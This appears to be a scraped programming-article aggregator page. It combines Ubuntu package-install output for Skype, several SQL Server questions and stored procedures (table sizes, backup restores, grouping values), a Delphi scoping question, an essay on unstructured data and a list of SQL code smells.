libx11-xcb1:i386 libxau6:i386 libxcb-dri2-0 libxcb-dri2-0:i386 libxcb-glx0 libxcb-glx0:i386 libxcb1 libxcb1:i386 libxdamage1:i386 libxdmcp6:i386 libxext6 libxext6:i386 libxfixes3 libxfixes3:i386 libxi6 libxi6:i386 libxml2 libxml2:i386 libxrender1 libxrender1:i386 libxslt1.1:i386 libxss1:i386 libxt6 libxt6:i386 libxv1 libxv1:i386 libxxf86vm1 libxxf86vm1:i386 mysql-common qdbus skype-bin:i386 sni-qt:i386 zlib1g:i386 Suggested packages: nas:i386 glibc-doc:i386 locales:i386 rng-tools rng-tools:i386 libglide3 libglide3:i386 gnutls-bin gnutls-bin:i386 krb5-doc:i386 krb5-user:i386 libvisual-0.4-plugins:i386 gstreamer-codec-install:i386 gnome-codec-install:i386 gstreamer0.10-tools:i386 gstreamer0.10-plugins-base:i386 jackd2:i386 liblcms-utils:i386 pulseaudio:i386 libqt4-declarative-folderlistmodel libqt4-declarative-gestures libqt4-declarative-particles libqt4-declarative-shaders qt4-qmlviewer libqt4-declarative-folderlistmodel:i386 libqt4-declarative-gestures:i386 libqt4-declarative-particles:i386 libqt4-declarative-shaders:i386 qt4-qmlviewer:i386 libqt4-dev libqt4-dev:i386 libthai0:i386 libicu48:i386 qt4-qtconfig qt4-qtconfig:i386 Recommended packages: libtxc-dxtn0:i386 xml-core:i386 The following NEW packages will be installed gcc-4.7-base:i386 libasound2:i386 libasound2-plugins:i386 libasyncns0:i386 libaudio2:i386 libavahi-client3:i386 libavahi-common-data:i386 libavahi-common3:i386 libc6:i386 libcomerr2:i386 libcups2:i386 libdbus-1-3:i386 libdbusmenu-qt2:i386 libdrm-intel1:i386 libdrm-nouveau2:i386 libdrm-radeon1:i386 libdrm2:i386 libexpat1:i386 libffi6:i386 libflac8:i386 libfontconfig1:i386 libfreetype6:i386 libgcc1:i386 libgcrypt11:i386 libgl1-mesa-dri:i386 libgl1-mesa-glx:i386 libglapi-mesa:i386 libglib2.0-0:i386 libgnutls26:i386 libgpg-error0:i386 libgssapi-krb5-2:i386 libgstreamer-plugins-base0.10-0:i386 libgstreamer0.10-0:i386 libice6:i386 libjack-jackd2-0:i386 libjbig0:i386 libjpeg-turbo8:i386 libjpeg8:i386 libjson0:i386 libk5crypto3:i386 libkeyutils1:i386 libkrb5-3:i386 libkrb5support0:i386 liblcms1:i386 libllvm3.2:i386 liblzma5:i386 libmng1:i386 libmysqlclient18:i386 libogg0:i386 liborc-0.4-0:i386 libp11-kit0:i386 libpciaccess0:i386 libpcre3:i386 libpng12-0:i386 libpulse0:i386 libqt4-dbus:i386 libqt4-declarative:i386 libqt4-network:i386 libqt4-opengl:i386 libqt4-script:i386 libqt4-sql:i386 libqt4-sql-mysql:i386 libqt4-xml:i386 libqt4-xmlpatterns:i386 libqtcore4:i386 libqtgui4:i386 libqtwebkit4:i386 libsamplerate0:i386 libselinux1:i386 libsm6:i386 libsndfile1:i386 libspeexdsp1:i386 libsqlite3-0:i386 libssl1.0.0:i386 libstdc++6:i386 libtasn1-3:i386 libtiff5:i386 libtxc-dxtn-s2tc0:i386 libuuid1:i386 libvorbis0a:i386 libvorbisenc2:i386 libwrap0:i386 libx11-6:i386 libx11-xcb1:i386 libxau6:i386 libxcb-dri2-0:i386 libxcb-glx0:i386 libxcb1:i386 libxdamage1:i386 libxdmcp6:i386 libxext6:i386 libxfixes3:i386 libxi6:i386 libxml2:i386 libxrender1:i386 libxslt1.1:i386 libxss1:i386 libxt6:i386 libxv1:i386 libxxf86vm1:i386 mysql-common skype skype-bin:i386 sni-qt:i386 zlib1g:i386 The following packages will be upgraded: libasound2 libdbus-1-3 libdrm-intel1 libdrm-nouveau2 libdrm-radeon1 libdrm2 libgcrypt11 libgl1-mesa-dri libgnutls26 libqt4-dbus libqt4-declarative libqt4-designer libqt4-help libqt4-network libqt4-opengl libqt4-script libqt4-scripttools libqt4-sql libqt4-sql-sqlite libqt4-svg libqt4-test libqt4-xml libqt4-xmlpatterns libqtcore4 libqtgui4 libssl1.0.0 libtiff5 libx11-6 libx11-xcb1 libxcb-dri2-0 libxcb-glx0 libxcb1 libxext6 libxfixes3 libxi6 libxml2 libxrender1 libxt6 libxv1 libxxf86vm1 qdbus 41 upgraded, 105 newly installed, 0 to remove and 138 not upgraded. Need to get 85.9 MB/89.2 MB of archives. After this operation, 204 MB of additional disk space will be used. Do you want to continue [Y/n]? aptitude install skype: Reading package lists... Building dependency tree... Reading state information... Reading extended state information... Initialising package states... The following NEW packages will be installed: gcc-4.7-base:i386{a} libasound2:i386{a} libasound2-plugins:i386{a} libasyncns0:i386{a} libaudio2:i386{a} libavahi-client3:i386{a} libavahi-common-data:i386{a} libavahi-common3:i386{a} libc6:i386{a} libcomerr2:i386{a} libcups2:i386{a} libdbus-1-3:i386{a} libdbusmenu-qt2:i386{a} libdrm-intel1:i386{a} libdrm-nouveau2:i386{a} libdrm-radeon1:i386{a} libdrm2:i386{a} libexpat1:i386{a} libffi6:i386{a} libflac8:i386{a} libfontconfig1:i386{a} libfreetype6:i386{a} libgcc1:i386{a} libgcrypt11:i386{a} libgl1-mesa-dri:i386{a} libgl1-mesa-glx:i386{a} libglapi-mesa:i386{a} libglib2.0-0:i386{a} libgnutls26:i386{a} libgpg-error0:i386{a} libgssapi-krb5-2:i386{a} libgstreamer-plugins-base0.10-0:i386{a} libgstreamer0.10-0:i386{a} libice6:i386{a} libjack-jackd2-0:i386{a} libjbig0:i386{a} libjpeg-turbo8:i386{a} libjpeg8:i386{a} libjson0:i386{a} libk5crypto3:i386{a} libkeyutils1:i386{a} libkrb5-3:i386{a} libkrb5support0:i386{a} liblcms1:i386{a} libllvm3.2:i386{a} liblzma5:i386{a} libmng1:i386{a} libmysqlclient18:i386{a} libogg0:i386{a} liborc-0.4-0:i386{a} libp11-kit0:i386{a} libpciaccess0:i386{a} libpcre3:i386{a} libpng12-0:i386{a} libpulse0:i386{a} libqt4-dbus:i386{a} libqt4-declarative:i386{a} libqt4-network:i386{a} libqt4-opengl:i386{a} libqt4-script:i386{a} libqt4-sql:i386{a} libqt4-sql-mysql:i386{a} libqt4-xml:i386{a} libqt4-xmlpatterns:i386{a} libqtcore4:i386{a} libqtgui4:i386{a} libqtwebkit4:i386{a} libsamplerate0:i386{a} libselinux1:i386{a} libsm6:i386{a} libsndfile1:i386{a} libspeexdsp1:i386{a} libsqlite3-0:i386{a} libssl1.0.0:i386{a} libstdc++6:i386{a} libtasn1-3:i386{a} libtiff5:i386{a} libtxc-dxtn-s2tc0:i386{a} libuuid1:i386{a} libvorbis0a:i386{a} libvorbisenc2:i386{a} libwrap0:i386{a} libx11-6:i386{a} libx11-xcb1:i386{a} libxau6:i386{a} libxcb-dri2-0:i386{a} libxcb-glx0:i386{a} libxcb1:i386{a} libxdamage1:i386{a} libxdmcp6:i386{a} libxext6:i386{a} libxfixes3:i386{a} libxi6:i386{a} libxml2:i386{a} libxrender1:i386{a} libxslt1.1:i386{a} libxss1:i386{a} libxt6:i386{a} libxv1:i386{a} libxxf86vm1:i386{a} mysql-common{a} skype skype-bin:i386{a} sni-qt:i386{a} zlib1g:i386{a} The following packages will be upgraded: libasound2 libdbus-1-3 libdrm-intel1 libdrm-nouveau2 libdrm-radeon1 libdrm2 libgcrypt11 libgl1-mesa-dri libgnutls26 libqt4-dbus libqt4-declarative libqt4-network libqt4-opengl libqt4-script libqt4-sql libqt4-xml libqt4-xmlpatterns libqtcore4 libqtgui4 libssl1.0.0 libtiff5 libx11-6 libx11-xcb1 libxcb-dri2-0 libxcb-glx0 libxcb1 libxext6 libxfixes3 libxi6 libxml2 libxrender1 libxt6 libxv1 libxxf86vm1 qdbus 35 packages upgraded, 105 newly installed, 0 to remove and 144 not upgraded. Need to get 81.7 MB/85.0 MB of archives. After unpacking 204 MB will be used. The following packages have unmet dependencies: libqt4-test : Depends: libqtcore4 (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. libqt4-designer : Depends: libqt4-script (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. Depends: libqt4-xml (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. Depends: libqtcore4 (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. Depends: libqtgui4 (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. libqt4-sql-sqlite : Depends: libqt4-sql (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. Depends: libqtcore4 (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. libqt4-help : Depends: libqt4-network (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. Depends: libqt4-sql (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. Depends: libqtcore4 (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. Depends: libqtgui4 (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. libqt4-svg : Depends: libqtcore4 (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. Depends: libqtgui4 (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. libqt4-scripttools : Depends: libqt4-script (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. Depends: libqtcore4 (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. Depends: libqtgui4 (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. The following actions will resolve these dependencies: Remove the following packages: 1) account-plugin-aim 2) account-plugin-facebook 3) account-plugin-flickr 4) account-plugin-generic-oauth 5) account-plugin-google 6) account-plugin-jabber 7) account-plugin-salut 8) account-plugin-twitter 9) account-plugin-windows-live 10) account-plugin-yahoo 11) empathy 12) friends 13) friends-dispatcher 14) friends-facebook 15) friends-twitter 16) gir1.2-signon-1.0 17) gnome-control-center-signon 18) libaccount-plugin-1.0-0 19) libfriends0 20) libqt4-designer 21) libqt4-help 22) libqt4-scripttools 23) libqt4-sql-sqlite 24) libqt4-svg 25) libqt4-test 26) libsignon-glib1 27) mcp-account-manager-uoa 28) nautilus-sendto-empathy 29) python-qt4 30) shotwell 31) signon-plugin-oauth2 32) signon-plugin-password 33) signon-ui 34) signond 35) ubuntu-sso-client-qt 36) ubuntuone-control-panel-qt 37) unity-lens-friends 38) unity-lens-photos 39) unity-scope-gdrive 40) webaccounts-extension-common 41) xul-ext-webaccounts Leave the following dependencies unresolved: 42) mcp-account-manager-uoa recommends gnome-control-center-signon 43) mcp-account-manager-uoa recommends account-plugin-aim 44) mcp-account-manager-uoa recommends account-plugin-jabber 45) mcp-account-manager-uoa recommends account-plugin-google 46) mcp-account-manager-uoa recommends account-plugin-facebook 47) mcp-account-manager-uoa recommends account-plugin-windows-live 48) mcp-account-manager-uoa recommends account-plugin-yahoo 49) mcp-account-manager-uoa recommends account-plugin-salut 50) ubuntu-desktop recommends empathy 51) ubuntu-desktop recommends libqt4-sql-sqlite 52) ubuntu-desktop recommends shotwell 53) ubuntu-desktop recommends ubuntuone-control-panel-qt 54) ubuntu-desktop recommends xul-ext-webaccounts 55) unity recommends unity-lens-photos 56) unity recommends unity-lens-friends 57) unity-lens-files recommends unity-scope-gdrive 58) libqt4-sql recommends libqt4-sql-mysql | libqt4-sql-odbc | libqt4-sql-ps Accept this solution? [Y/n/q/?] And in case this helps, aptitude show skype: Package: skype State: not installed Version: 4.2.0.11-0ubuntu0.12.04.2 Priority: extra Section: net Maintainer: Steve Langasek <[email protected]> Architecture: amd64 Uncompressed Size: 62.5 k Depends: skype-bin Conflicts: skype Description: client for Skype VOIP and instant messaging service Skype is software that enables the world's conversations. Millions of individuals and businesses use Skype to make free video and voice calls, send instant messages and share files with other Skype users. Every day, people also use Skype to make low-cost calls to landlines and mobiles. * Make free Skype-to-Skype calls to anyone else, anywhere in the world. * Call to landlines and mobiles at great rates. * Group chat with up to 200 people or conference call with up to 25 others. * Free to download.

    Read the article

  • Grouping a comma separated value on common data [closed]

    - by Ankit
    I have a table with col1 id int, col2 as varchar (comma separated values) and column 3 for assigning group to them. Table looks like col1 col2 group .............................. 1 2,3,4 2 5,6 3 1,2,5 4 7,8 5 11,3 6 22,8 This is only the sample of real data, now I have to assign a group no to them in such a way that output looks like col1 col2 group .............................. 1 2,3,4 1 2 5,6 1 3 1,2,5 1 4 7,8 2 5 11,3 1 6 22,8 2 The logic for assigning group no is that every similar comma separated value of string in col2 have to be same group no as every where in col2 where '2' is there it has to be same group no but the complication is that 2,3,4 are together so they all three int value if found in any where in col2 will be assigned same group. The major part is 2,3,4 and 1,2,5 both in col2 have 2 so all int 1,2,3,4,5 have to assign same group no. Tried store procedure with match against on col2 but not getting desired result Most imp (I can't use normalization, because I can't afford to make new table from my original table which have millions of records), even normalization is not helpful in my context. This question is also on stackoverflow with bounty on this link Achieved so far:- I have set the group column auto increment and then wrote this procedure:- BEGIN declare cil1_new,col2_new,group_new int; declare done tinyint default 0; declare group_new varchar(100); declare cur1 cursor for select col1,col2,`group` from company ; DECLARE CONTINUE HANDLER FOR NOT FOUND SET done=1; open cur1; REPEAT fetch cur1 into col1_new,col2_new,group_new; update company set group=group_new where match(col2) against(concat("'",col2_new,"'")); until done end repeat; close cur1; select * from company; END This procedure is working, no syntax mistake but the problem is that I am not achieving the desired result exactly.

    Read the article

  • Determine All SQL Server Table Sizes

    Im doing some work to migrate and optimize a large-ish (40GB) SQL Server database at the moment.  Moving such a database between data centers over the Internet is not without its challenges.  In my case, virtually all of the size of the database is the result of one table, which has over 200M rows of data.  To determine the size of this table on disk, you can run the sp_TableSize stored procedure, like so: EXEC sp_spaceused lq_ActivityLog This results in the following: Of course this is only showing one table if you have a lot of tables and need to know which ones are taking up the most space, it would be nice if you could run a query to list all of the tables, perhaps ordered by the space theyre taking up.  Thanks to Mitchel Sellers (and Gregg Starks CURSOR template) and a tiny bit of my own edits, now you can!  Create the stored procedure below and call it to see a listing of all user tables in your database, ordered by their reserved space. -- Lists Space Used for all user tablesCREATE PROCEDURE GetAllTableSizesASDECLARE @TableName VARCHAR(100)DECLARE tableCursor CURSOR FORWARD_ONLYFOR select [name]from dbo.sysobjects where OBJECTPROPERTY(id, N'IsUserTable') = 1FOR READ ONLYCREATE TABLE #TempTable( tableName varchar(100), numberofRows varchar(100), reservedSize varchar(50), dataSize varchar(50), indexSize varchar(50), unusedSize varchar(50))OPEN tableCursorWHILE (1=1)BEGIN FETCH NEXT FROM tableCursor INTO @TableName IF(@@FETCH_STATUS<>0) BREAK; INSERT #TempTable EXEC sp_spaceused @TableNameENDCLOSE tableCursorDEALLOCATE tableCursorUPDATE #TempTableSET reservedSize = REPLACE(reservedSize, ' KB', '')SELECT tableName 'Table Name',numberofRows 'Total Rows',reservedSize 'Reserved KB',dataSize 'Data Size',indexSize 'Index Size',unusedSize 'Unused Size'FROM #TempTableORDER BY CONVERT(bigint,reservedSize) DESCDROP TABLE #TempTableGO Did you know that DotNetSlackers also publishes .net articles written by top known .net Authors? We already have over 80 articles in several categories including Silverlight. Take a look: here.

    Read the article

  • Why is my query soooooo slow?

    - by geekrutherford
    A stored procedure used in our production environment recently became so slow it cause the calling web service to begin timing out. When running the stored procedure in Query Analyzer it took nearly 3 minutes to complete.   The stored procedure itself does little more than create a small bit of dynamic SQL which calls a view with a where clause at the end.   At first the thought was that the query used within the view needed to be optimized. The query is quite long and therefore easy to jump to this conclusion.   Fortunately, after bringing the issue to the attention of a coworker they asked "is there a where clause, and if so, is there an index on the column(s) in it?" I had no idea and quickly said as much. A quick check on the table/column utilized in the where clause indicated indeed there was no index.   Before adding the index, and after admitting I am no SQL wiz, I checked the internet for info on the difference between clustered and non-clustered indexes. I found the following site quite helpful OdeToCode. After adding the non-clustered index on the column, the query that used to take nearly 3 minutes now takes 10 seconds! Ah, if only I'd thought to do this ahead of time!

    Read the article

  • Advice on whether to use scripting, run time compile or something else

    - by Gaz83
    I work in the prodution area at my works and I design and create the software to run our automated test equipment. Everytime I get involved with a new machine I end up with a different and (hopefully) better design. Anyway I have come to the point where I feel I need to start standardization all the machines with the same program. I see a problem when it comes to applying updates as at the moment the test procedures are hard coded into the program at each station. I neeed to be able to update the core program without affecting the testing section. The way I see it that this will mean splitting the program into 2 sections. Main UI - This is the core that talks to everything on the machine such as cameras, sensors, printer etc and is a standalone application. Test Procedure - This is the steps that is executeted everytime the machine runs through a test. The main UI will load the test procedure and execute when ever a test is required. My question is what is the best approach to this in terms of having an application load a file and execute the code with in? Take into account that the code in the test procedure will need access to public methods on the UI/core system to communicate to sensors etc. I have heard about MS Roslyn and had a quick look, would this solve my issue?

    Read the article

  • Restoring multiple database backups in a transaction

    - by Raghu Dodda
    I wrote a stored procedure that restores as set of the database backups. It takes two parameters - a source directory and a restore directory. The procedure looks for all .bak files in the source directory (recursively) and restores all the databases. The stored procedure works as expected, but it has one issue - if I uncomment the try-catch statements, the procedure terminates with the following error: error_number = 3013 error_severity = 16 error_state = 1 error_message = DATABASE is terminating abnormally. The weird part is sometimes (it is not consistent) the restore is done even if the error occurs. The procedure: create proc usp_restore_databases ( @source_directory varchar(1000), @restore_directory varchar(1000) ) as begin declare @number_of_backup_files int -- begin transaction -- begin try -- step 0: Initial validation if(right(@source_directory, 1) <> '\') set @source_directory = @source_directory + '\' if(right(@restore_directory, 1) <> '\') set @restore_directory = @restore_directory + '\' -- step 1: Put all the backup files in the specified directory in a table -- declare @backup_files table ( file_path varchar(1000)) declare @dos_command varchar(1000) set @dos_command = 'dir ' + '"' + @source_directory + '*.bak" /s/b' /* DEBUG */ print @dos_command insert into @backup_files(file_path) exec xp_cmdshell @dos_command delete from @backup_files where file_path IS NULL select @number_of_backup_files = count(1) from @backup_files /* DEBUG */ select * from @backup_files /* DEBUG */ print @number_of_backup_files -- step 2: restore each backup file -- declare backup_file_cursor cursor for select file_path from @backup_files open backup_file_cursor declare @index int; set @index = 0 while(@index < @number_of_backup_files) begin declare @backup_file_path varchar(1000) fetch next from backup_file_cursor into @backup_file_path /* DEBUG */ print @backup_file_path -- step 2a: parse the full backup file name to get the DB file name. declare @db_name varchar(100) set @db_name = right(@backup_file_path, charindex('\', reverse(@backup_file_path)) -1) -- still has the .bak extension /* DEBUG */ print @db_name set @db_name = left(@db_name, charindex('.', @db_name) -1) /* DEBUG */ print @db_name set @db_name = lower(@db_name) /* DEBUG */ print @db_name -- step 2b: find out the logical names of the mdf and ldf files declare @mdf_logical_name varchar(100), @ldf_logical_name varchar(100) declare @backup_file_contents table ( LogicalName nvarchar(128), PhysicalName nvarchar(260), [Type] char(1), FileGroupName nvarchar(128), [Size] numeric(20,0), [MaxSize] numeric(20,0), FileID bigint, CreateLSN numeric(25,0), DropLSN numeric(25,0) NULL, UniqueID uniqueidentifier, ReadOnlyLSN numeric(25,0) NULL, ReadWriteLSN numeric(25,0) NULL, BackupSizeInBytes bigint, SourceBlockSize int, FileGroupID int, LogGroupGUID uniqueidentifier NULL, DifferentialBaseLSN numeric(25,0) NULL, DifferentialBaseGUID uniqueidentifier, IsReadOnly bit, IsPresent bit ) insert into @backup_file_contents exec ('restore filelistonly from disk=' + '''' + @backup_file_path + '''') select @mdf_logical_name = LogicalName from @backup_file_contents where [Type] = 'D' select @ldf_logical_name = LogicalName from @backup_file_contents where [Type] = 'L' /* DEBUG */ print @mdf_logical_name + ', ' + @ldf_logical_name -- step 2c: restore declare @mdf_file_name varchar(1000), @ldf_file_name varchar(1000) set @mdf_file_name = @restore_directory + @db_name + '.mdf' set @ldf_file_name = @restore_directory + @db_name + '.ldf' /* DEBUG */ print 'mdf_logical_name = ' + @mdf_logical_name + '|' + 'ldf_logical_name = ' + @ldf_logical_name + '|' + 'db_name = ' + @db_name + '|' + 'backup_file_path = ' + @backup_file_path + '|' + 'restore_directory = ' + @restore_directory + '|' + 'mdf_file_name = ' + @mdf_file_name + '|' + 'ldf_file_name = ' + @ldf_file_name restore database @db_name from disk = @backup_file_path with move @mdf_logical_name to @mdf_file_name, move @ldf_logical_name to @ldf_file_name -- step 2d: iterate set @index = @index + 1 end close backup_file_cursor deallocate backup_file_cursor -- end try -- begin catch -- print error_message() -- rollback transaction -- return -- end catch -- -- commit transaction end Does anybody have any ideas why this might be happening? Another question: is the transaction code useful ? i.e., if there are 2 databases to be restored, will SQL Server undo the restore of one database if the second restore fails?

    Read the article

  • Declare Locally or Globally in Delphi?

    - by lkessler
    I have a procedure my program calls tens of thousands of times that uses a generic structure like this: procedure PrintIndiEntry(JumpID: string); type TPeopleIncluded = record IndiPtr: pointer; Relationship: string; end; var PeopleIncluded: TList<TPeopleIncluded>; PI: TPeopleIncluded; begin { PrintIndiEntry } PeopleIncluded := TList<TPeopleIncluded>.Create; { A loop here that determines a small number (up to 100) people to process } while ... do begin PI.IndiPtr := ...; PI.Relationship := ...; PeopleIncluded.Add(PI); end; DoSomeProcess(PeopleIncluded); PeopleIncluded.Clear; PeopleIncluded.Free; end { PrintIndiEntry } Alternatively, I can declare PeopleIncluded globally rather than locally as follows: unit process; interface type TPeopleIncluded = record IndiPtr: pointer; Relationship: string; end; var PeopleIncluded: TList<TPeopleIncluded>; PI: TPeopleIncluded; procedure PrintIndiEntry(JumpID: string); begin { PrintIndiEntry } { A loop here that determines a small number (up to 100) people to process } while ... do begin PI.IndiPtr := ...; PI.Relationship := ...; PeopleIncluded.Add(PI); end; DoSomeProcess(PeopleIncluded); PeopleIncluded.Clear; end { PrintIndiEntry } procedure InitializeProcessing; begin PeopleIncluded := TList<TPeopleIncluded>.Create; end; procedure FinalizeProcessing; begin PeopleIncluded.Free; end; My question is whether in this situation it is better to declare PeopleIncluded globally rather than locally. I know the theory is to define locally whenever possible, but I would like to know if there are any issues to worry about with regards to doing tens of thousands of of "create"s and "free"s? Making them global will do only one create and one free. What is the recommended method to use in this case? If the recommended method is to still define it locally, then I'm wondering if there are any situations where it is better to define globally when defining locally is still an option.

    Read the article

  • Unstructured Data - The future of Data Administration

    Some have claimed that there is a problem with the way data is currently managed using the relational paradigm do to the rise of unstructured data in modern business. PCMag.com defines unstructured data as data that does not reside in a fixed location. They further explain that unstructured data refers to data in a free text form that is not bound to any specific structure. With the rise of unstructured data in the form of emails, spread sheets, images and documents the critics have a right to argue that the relational paradigm is not as effective as the object oriented data paradigm in managing this type of data. The relational paradigm relies heavily on structure and relationships in and between items of data. This type of paradigm works best in a relation database management system like Microsoft SQL, MySQL, and Oracle because data is forced to conform to a structure in the form of tables and relations can be derived from the existence of one or more tables. These critics also claim that database administrators have not kept up with reality because their primary focus in regards to data administration deals with structured data and the relational paradigm. The relational paradigm was developed in the 1970’s as a way to improve data management when compared to standard flat files. Little has changed since then, and modern database administrators need to know more than just how to handle structured data. That is why critics claim that today’s data professionals do not have the proper skills in order to store and maintain data for modern systems when compared to the skills of system designers, programmers , software engineers, and data designers  due to the industry trend of object oriented design and development. I think that they are wrong. I do not disagree that the industry is moving toward an object oriented approach to development with the potential to use more of an object oriented approach to data.   However, I think that it is business itself that is limiting database administrators from changing how data is stored because of the potential costs, and impact that might occur by altering any part of stored data. Furthermore, database administrators like all technology workers constantly are trying to improve their technical skills in order to excel in their job, so I think that accusing data professional is not just when the root cause of the lack of innovation is controlled by business, and it is business that will suffer for their inability to keep up with technology. One way for database professionals to better prepare for the future of database management is start working with data in the form of objects and so that they can extract data from the objects so that the stored information within objects can be used in relation to the data stored in a using the relational paradigm. Furthermore, I think the use of pattern matching will increase with the increased use of unstructured data because object can be selected, filtered and altered based on the existence of a pattern found within an object.

    Read the article

  • Listing common SQL Code Smells.

    - by Phil Factor
    Once you’ve done a number of SQL Code-reviews, you’ll know those signs in the code that all might not be well. These ’Code Smells’ are coding styles that don’t directly cause a bug, but are indicators that all is not well with the code. . Kent Beck and Massimo Arnoldi seem to have coined the phrase in the "OnceAndOnlyOnce" page of www.C2.com, where Kent also said that code "wants to be simple". Bad Smells in Code was an essay by Kent Beck and Martin Fowler, published as Chapter 3 of the book ‘Refactoring: Improving the Design of Existing Code’ (ISBN 978-0201485677) Although there are generic code-smells, SQL has its own particular coding habits that will alert the programmer to the need to re-factor what has been written. See Exploring Smelly Code   and Code Deodorants for Code Smells by Nick Harrison for a grounding in Code Smells in C# I’ve always been tempted by the idea of automating a preliminary code-review for SQL. It would be so useful to trawl through code and pick up the various problems, much like the classic ‘Lint’ did for C, and how the Code Metrics plug-in for .NET Reflector by Jonathan 'Peli' de Halleux is used for finding Code Smells in .NET code. The problem is that few of the standard procedural code smells are relevant to SQL, and we need an agreed list of code smells. Merrilll Aldrich made a grand start last year in his blog Top 10 T-SQL Code Smells.However, I'd like to make a start by discovering if there is a general opinion amongst Database developers what the most important SQL Smells are. One can be a bit defensive about code smells. I will cheerfully write very long stored procedures, even though they are frowned on. I’ll use dynamic SQL occasionally. You can only use them as an aid for your own judgment and it is fine to ‘sign them off’ as being appropriate in particular circumstances. Also, whole classes of ‘code smells’ may be irrelevant for a particular database. The use of proprietary SQL, for example, is only a ‘code smell’ if there is a chance that the database will have to be ported to another RDBMS. The use of dynamic SQL is a risk only with certain security models. As the saying goes,  a CodeSmell is a hint of possible bad practice to a pragmatist, but a sure sign of bad practice to a purist. Plamen Ratchev’s wonderful article Ten Common SQL Programming Mistakes lists some of these ‘code smells’ along with out-and-out mistakes, but there are more. The use of nested transactions, for example, isn’t entirely incorrect, even though the database engine ignores all but the outermost: but it does flag up the possibility that the programmer thinks that nested transactions are supported. If anything requires some sort of general agreement, the definition of code smells is one. I’m therefore going to make this Blog ‘dynamic, in that, if anyone twitters a suggestion with a #SQLCodeSmells tag (or sends me a twitter) I’ll update the list here. If you add a comment to the blog with a suggestion of what should be added or removed, I’ll do my best to oblige. In other words, I’ll try to keep this blog up to date. The name against each 'smell' is the name of the person who Twittered me, commented about or who has written about the 'smell'. it does not imply that they were the first ever to think of the smell! Use of deprecated syntax such as *= (Dave Howard) Denormalisation that requires the shredding of the contents of columns. (Merrill Aldrich) Contrived interfaces Use of deprecated datatypes such as TEXT/NTEXT (Dave Howard) Datatype mis-matches in predicates that rely on implicit conversion.(Plamen Ratchev) Using Correlated subqueries instead of a join   (Dave_Levy/ Plamen Ratchev) The use of Hints in queries, especially NOLOCK (Dave Howard /Mike Reigler) Few or No comments. Use of functions in a WHERE clause. (Anil Das) Overuse of scalar UDFs (Dave Howard, Plamen Ratchev) Excessive ‘overloading’ of routines. The use of Exec xp_cmdShell (Merrill Aldrich) Excessive use of brackets. (Dave Levy) Lack of the use of a semicolon to terminate statements Use of non-SARGable functions on indexed columns in predicates (Plamen Ratchev) Duplicated code, or strikingly similar code. Misuse of SELECT * (Plamen Ratchev) Overuse of Cursors (Everyone. Special mention to Dave Levy & Adrian Hills) Overuse of CLR routines when not necessary (Sam Stange) Same column name in different tables with different datatypes. (Ian Stirk) Use of ‘broken’ functions such as ‘ISNUMERIC’ without additional checks. Excessive use of the WHILE loop (Merrill Aldrich) INSERT ... EXEC (Merrill Aldrich) The use of stored procedures where a view is sufficient (Merrill Aldrich) Not using two-part object names (Merrill Aldrich) Using INSERT INTO without specifying the columns and their order (Merrill Aldrich) Full outer joins even when they are not needed. (Plamen Ratchev) Huge stored procedures (hundreds/thousands of lines). Stored procedures that can produce different columns, or order of columns in their results, depending on the inputs. Code that is never used. Complex and nested conditionals WHILE (not done) loops without an error exit. Variable name same as the Datatype Vague identifiers. Storing complex data  or list in a character map, bitmap or XML field User procedures with sp_ prefix (Aaron Bertrand)Views that reference views that reference views that reference views (Aaron Bertrand) Inappropriate use of sql_variant (Neil Hambly) Errors with identity scope using SCOPE_IDENTITY @@IDENTITY or IDENT_CURRENT (Neil Hambly, Aaron Bertrand) Schemas that involve multiple dated copies of the same table instead of partitions (Matt Whitfield-Atlantis UK) Scalar UDFs that do data lookups (poor man's join) (Matt Whitfield-Atlantis UK) Code that allows SQL Injection (Mladen Prajdic) Tables without clustered indexes (Matt Whitfield-Atlantis UK) Use of "SELECT DISTINCT" to mask a join problem (Nick Harrison) Multiple stored procedures with nearly identical implementation. (Nick Harrison) Excessive column aliasing may point to a problem or it could be a mapping implementation. (Nick Harrison) Joining "too many" tables in a query. (Nick Harrison) Stored procedure returning more than one record set. (Nick Harrison) A NOT LIKE condition (Nick Harrison) excessive "OR" conditions. (Nick Harrison) User procedures with sp_ prefix (Aaron Bertrand) Views that reference views that reference views that reference views (Aaron Bertrand) sp_OACreate or anything related to it (Bill Fellows) Prefixing names with tbl_, vw_, fn_, and usp_ ('tibbling') (Jeremiah Peschka) Aliases that go a,b,c,d,e... (Dave Levy/Diane McNurlan) Overweight Queries (e.g. 4 inner joins, 8 left joins, 4 derived tables, 10 subqueries, 8 clustered GUIDs, 2 UDFs, 6 case statements = 1 query) (Robert L Davis) Order by 3,2 (Dave Levy) MultiStatement Table functions which are then filtered 'Sel * from Udf() where Udf.Col = Something' (Dave Ballantyne) running a SQL 2008 system in SQL 2000 compatibility mode(John Stafford)

    Read the article

  • Cherokee web server on Ubuntu Lucid

    - by Fazal
